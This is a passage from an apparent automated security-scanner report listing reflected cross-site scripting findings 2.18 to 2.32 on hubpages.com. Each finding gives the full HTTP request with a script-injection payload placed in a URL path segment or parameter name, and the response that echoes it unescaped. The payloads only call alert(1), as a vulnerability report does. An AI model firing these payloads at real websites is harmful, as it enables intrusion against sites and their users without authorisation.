Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about23253"><script>alert(1)</script>b500e541fe8/advertise', 'Page not found'); return false;">
...[SNIP]...

2.18. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /about/advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied, together with the rest of the query string, into a double-quoted onclick attribute as the first argument to showLinkArticle. The payload 40c6c"><script>alert(1)</script>7545254ff79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response, where the double quote closes the attribute and the remainder of the payload is parsed as new markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 9876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1', 'Advertise on HubPages'); return false;">
...[SNIP]...

2.19. http://hubpages.com/hubs/hot/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /hubs/hot/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8bd"><script>alert(1)</script>8ae6a13056a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad8bd"><script>alert(1)</script>8ae6a13056a/hot/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:40 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/ad8bd"><script>alert(1)</script>8ae6a13056a/hot/', 'Page not found'); return false;">
...[SNIP]...

2.20. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /hubs/hot/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd29"><script>alert(1)</script>a7b16cce6e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 19071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Hot Hubs" href="http://hubpages.com/hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1&amp;rss" />
...[SNIP]...

2.21. http://hubpages.com/my/hubs/stats [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42fda"><script>alert(1)</script>dcab9466b78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:08 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats', 'Page not found'); return false;">
...[SNIP]...

2.22. http://hubpages.com/my/hubs/stats [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bf69"><script>alert(1)</script>92d7c54b2f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats', 'Page not found'); return false;">
...[SNIP]...

2.23. http://hubpages.com/my/hubs/stats [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 277b5"><script>alert(1)</script>f325d2bc4d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:28 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8', 'Page not found'); return false;">
...[SNIP]...

2.24. http://hubpages.com/signin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>e576f82391c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

2.25. http://hubpages.com/topics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /topics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f48"><script>alert(1)</script>a4d9d607aff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics99f48"><script>alert(1)</script>a4d9d607aff/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics99f48"><script>alert(1)</script>a4d9d607aff/', 'Page not found'); return false;">
...[SNIP]...

2.26. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /topics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fdc"><script>alert(1)</script>33eb76fcea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:36 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 66444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1', 'Popular Topics on HubPages'); return false;">
...[SNIP]...

2.27. http://hubpages.com/tour/affiliate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a6d1"><script>alert(1)</script>cc37e02719e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate', 'Page not found'); return false;">
...[SNIP]...

2.28. http://hubpages.com/tour/affiliate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6a5"><script>alert(1)</script>b63f5c1a6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:58 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd', 'HubPages Tour: not found'); return false;">
...[SNIP]...

2.29. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afa9"><script>alert(1)</script>d4f4f14b999 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 11829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1', 'HubPages Affiliate Tour'); return false;">
...[SNIP]...

2.30. http://hubpages.com/user/new/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f280"><script>alert(1)</script>1667bd96a88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user8f280"><script>alert(1)</script>1667bd96a88/new/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:10 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user8f280"><script>alert(1)</script>1667bd96a88/new/', 'Page not found'); return false;">
...[SNIP]...

2.31. http://hubpages.com/user/new/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e18"><script>alert(1)</script>a2b143d7180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new16e18"><script>alert(1)</script>a2b143d7180/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:12 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new16e18"><script>alert(1)</script>a2b143d7180/', 'Page not found'); return false;">
...[SNIP]...

2.32. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efef0"><script>alert(1)</script>856b8cf17c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:59 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 13342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
